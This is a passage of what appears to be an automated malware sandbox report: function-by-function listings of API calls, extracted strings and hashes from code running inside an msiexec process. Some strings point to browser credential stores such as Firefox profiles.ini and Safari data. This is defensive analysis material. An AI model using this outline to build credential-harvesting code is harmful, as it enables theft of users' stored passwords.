                                                                                                                                                • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                                                                • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                                                                Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                • memset.MSVCRT ref: 0040265F
                                                                                                                                                • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                                                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                • API String ID: 577499730-1134094380
                                                                                                                                                • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                                                • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                                                • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                • API String ID: 2787044678-1921111777
                                                                                                                                                • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                • GetDC.USER32 ref: 004140E3
                                                                                                                                                • wcslen.MSVCRT ref: 00414123
                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                • String ID: %s:$EDIT$STATIC
                                                                                                                                                • API String ID: 2080319088-3046471546
                                                                                                                                                • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                • memset.MSVCRT ref: 00413292
                                                                                                                                                • memset.MSVCRT ref: 004132B4
                                                                                                                                                • memset.MSVCRT ref: 004132CD
                                                                                                                                                • memset.MSVCRT ref: 004132E1
                                                                                                                                                • memset.MSVCRT ref: 004132FB
                                                                                                                                                • memset.MSVCRT ref: 00413310
                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                • memset.MSVCRT ref: 004133C0
                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                Strings
                                                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                • {Unknown}, xrefs: 004132A6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                • API String ID: 4111938811-1819279800
                                                                                                                                                • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 829165378-0
                                                                                                                                                • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00404172
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                • memset.MSVCRT ref: 00404200
                                                                                                                                                • memset.MSVCRT ref: 00404215
                                                                                                                                                • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                • memset.MSVCRT ref: 0040426E
                                                                                                                                                • memset.MSVCRT ref: 004042CD
                                                                                                                                                • memset.MSVCRT ref: 004042E2
                                                                                                                                                • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                • API String ID: 2454223109-1580313836
                                                                                                                                                • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                • API String ID: 4054529287-3175352466
                                                                                                                                                • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                • API String ID: 3143752011-1996832678
                                                                                                                                                • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                • API String ID: 667068680-2887671607
                                                                                                                                                • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                • API String ID: 1607361635-601624466
                                                                                                                                                • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                • API String ID: 2000436516-3842416460
                                                                                                                                                • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1043902810-0
                                                                                                                                                • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
